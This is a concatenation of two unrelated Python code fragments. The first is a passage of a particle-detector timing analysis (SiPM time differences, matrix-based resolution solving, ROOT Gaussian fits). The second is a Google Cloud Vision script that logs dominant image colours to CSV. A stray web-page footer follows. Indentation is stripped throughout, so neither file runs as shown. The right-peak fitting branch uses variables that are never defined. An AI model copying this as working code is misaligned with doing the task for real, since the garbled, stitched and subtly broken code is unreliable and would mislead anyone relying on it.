time_difference = np.zeros(len(time_location), dtype = time_location.dtype)
SiPM_chan = md.getChannelNameForSensor("SiPM-AFP")
for chan in time_location.dtype.names:
md.setChannelName(chan)
if md.getSensor() == "SiPM-AFP":
continue
for event in range (0, len(time_location)):
if time_location[SiPM_chan][event] != 0 and time_location[chan][event] != 0:
time_difference[chan][event] = (time_location[chan][event] - time_location[SiPM_chan][event])*1000
return time_difference
# This is used to produce ROOT files which have multiple solutions
# Note that the system of equations only applies to the first oscilloscope
# Reason: the first oscilloscope contains different sensors.
def getTimeDifferencePerRunSysEq(time_location):
dt = dm.getDTYPESysEq()
time_difference = np.zeros(len(time_location), dtype = dt)
channels_1st_oscilloscope = ["chan0", "chan1", "chan2", "chan3"]
for chan in channels_1st_oscilloscope:
chan2_list = list(channels_1st_oscilloscope)
chan2_list.remove(chan)
for event in range(0, len(time_location[chan])):
value = np.zeros(3)
for index in range(0, len(chan2_list)):
chan2 = chan2_list[index]
if time_location[chan][event] != 0 and time_location[chan2][event] != 0:
value[index] = (time_location[chan][event] - time_location[chan2][event])*1000
time_difference[chan][event] = value
return time_difference
# The input are two matrices, one with widths (\sigma_{ij}) of time difference graphs between sensor i and j and
# corresponding errors from the fits (\Delta\sigma_{ij}).
# The output is the width of sensor i (\sigma_i) and corresponding error (\Delta\sigma{i}). All values in [ps].
def solveSystemOfEqs(sigma_convoluted_matrix, error_convoluted_matrix):
matrices, inverses = possibleMatrices()
check_sum = 0
for index in range(0, len(matrices)):
matrix = matrices[index]
matrix_inv = inverses[index]
# Get \sigma_{i}
sigma_convoluted_squared = np.power(matrix.dot(sigma_convoluted_matrix).diagonal(), 2)
sigma_squared = matrix_inv.dot(sigma_convoluted_squared)
if np.any(sigma_squared < 0):
continue
sigma_solution = np.sqrt(sigma_squared)
# Get \Delta\sigma_{i}, note that the errors cannot be subtracted
error_convoluted = matrix.dot(error_convoluted_matrix).diagonal()
error_solution = abs(matrix_inv).dot(error_convoluted)
# Select the solution with the largest sum of timing resolutions
if check_sum < np.sum(sigma_solution):
sigma = sigma_solution
error = error_solution
check_sum = np.sum(sigma_solution)
return sigma, error
def getSigmasFromFit(TH1F_histogram, window_range, percentage):
# Change the window
xMin = TH1F_histogram.GetXaxis().GetBinCenter(TH1F_histogram.GetMaximumBin()) - window_range
xMax = TH1F_histogram.GetXaxis().GetBinCenter(TH1F_histogram.GetMaximumBin()) + window_range
TH1F_histogram.SetAxisRange(xMin, xMax)
# Set ranges to be at the positions of defined height
value_limit = TH1F_histogram.GetMaximum() * (1.0 - percentage)
xMin = TH1F_histogram.GetXaxis().GetBinCenter(TH1F_histogram.FindFirstBinAbove(value_limit))
xMax = TH1F_histogram.GetXaxis().GetBinCenter(TH1F_histogram.FindLastBinAbove(value_limit))
# Create fit function if the same oscilloscope
if md.checkIfSameOscAsSiPM():
fit_function = ROOT.TF1("gaus", "gaus", xMin, xMax)
# Create fit function if different oscilloscope
else:
# For some double-peak distributions the highest peak have to be set for the fit
# to function correctly. Change the bool accordingly!
high_peak_at_left = True
if high_peak_at_left:
# In the case when the highest peak is at left
amplitude_1 = TH1F_histogram.GetMaximum()
bin_second_peak = TH1F_histogram.GetBinCenter(TH1F_histogram.GetMaximumBin())+100
position_second_peak = TH1F_histogram.FindBin(bin_second_peak)
amplitude_2 = TH1F_histogram.GetBinContent(position_second_peak)
else:
# In the case when the highest peak is at right
bin_first_peak = TH1F_histogram.GetBinCenter(TH1F_histogram.GetMaximumBin())-100
position_first_peak = TH1F_histogram.FindBin(bin_second_peak)
amplitude_1 = TH1F_histogram.GetBinContent(position_second_peak)
amplitude_2 = TH1F_histogram.GetMaximum()
fit_function = ROOT.TF1("gaus", "[0]*exp(-0.5*((x-[1])/[2])^2) + [3]*exp(-0.5*((x-([1]+100))/[2])^2)", xMin, xMax)
fit_function.SetParameters(amplitude_1, TH1F_histogram.GetMean(), TH1F_histogram.GetStdDev(), amplitude_2)
fit_function.SetParNames("Constant1", "Mean1", "Sigma", "Constant2")
try:
# Create fit and calculate the width
TH1F_histogram.Fit("gaus", "Q", "", xMin, xMax)
th1_function = TH1F_histogram.GetFunction("gaus")
sigma_fit = th1_function.GetParameter(2)
sigma_fit_error = th1_function.GetParError(2)
sigma_SiPM = md.getSigmaSiPM()
if sigma_fit > sigma_SiPM:
sigma_DUT = np.sqrt(np.power(sigma_fit, 2) - np.power(sigma_SiPM, 2))
else:
sigma_DUT = 0
# In case that the fit fails, due to no data, ignore the result.
except:
sigma_DUT = 0
sigma_fit_error = 0
return sigma_DUT, sigma_fit_error
# Calculate all 4x4 matrices which have diagonal elements
def possibleMatrices():
# The arrays indicate the possible ways to extract the width between sensor i and j.
possible_combinations = np.array([ [1, 1, 0, 0], [1, 0, 1, 0], [1, 0, 0, 1], [0, 1, 1, 0], [0, 1, 0, 1], [0, 0, 1, 1] ])
matrices = []
inverses = []
for combination in list(it.permutations(possible_combinations,4)):
try:
matrix = np.array(combination)
inverse = np.linalg.inv(matrix)
# Require that the matrix have diagonal elements
if np.sum(matrix.diagonal()) != 4:
continue
matrices.append(matrix)
inverses.append(inverse)
except:
continue
return matrices, inverses
|
from pathlib import Path
import json
import csv
import time
def detect_properties(path):
"""Detects image properties in the file."""
from google.cloud import vision
import io
client = vision.ImageAnnotatorClient()
with io.open(path, 'rb') as image_file:
content = image_file.read()
image = vision.Image(content=content)
response = []
response = client.image_properties(image=image)
path = Path(path)
print(f'Processing image {path.name}')
row = []
row.append(path.name)
for color in response.image_properties_annotation.dominant_colors.colors:
row.append(color.color.red)
row.append(color.color.green)
row.append(color.color.blue)
row.append(color.score)
row.append(color.pixel_fraction)
return row
def main():
count = 0
pathlist = Path('./images').glob('**/*.png')
#pathlist = Path('./images').glob('**/000000014*.png')
with open('results.csv', mode='w') as results_file:
results_writer = csv.writer(results_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
cols = ['file']
extra_cols = [[f'r{i}', f'g{i}', f'b{i}', f'score{i}', f'pixelfraction{i}'] for i in range(1,11)]
for c in extra_cols:
cols.extend(c)
results_writer.writerow(cols)
for path in pathlist:
print(f'processing image {count+1}')
path_in_str = str(path)
row = detect_properties(path_in_str)
results_writer.writerow(row)
time.sleep(1)
count += 1
print(f'Total Images: {count}')
if __name__ == "__main__":
main() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.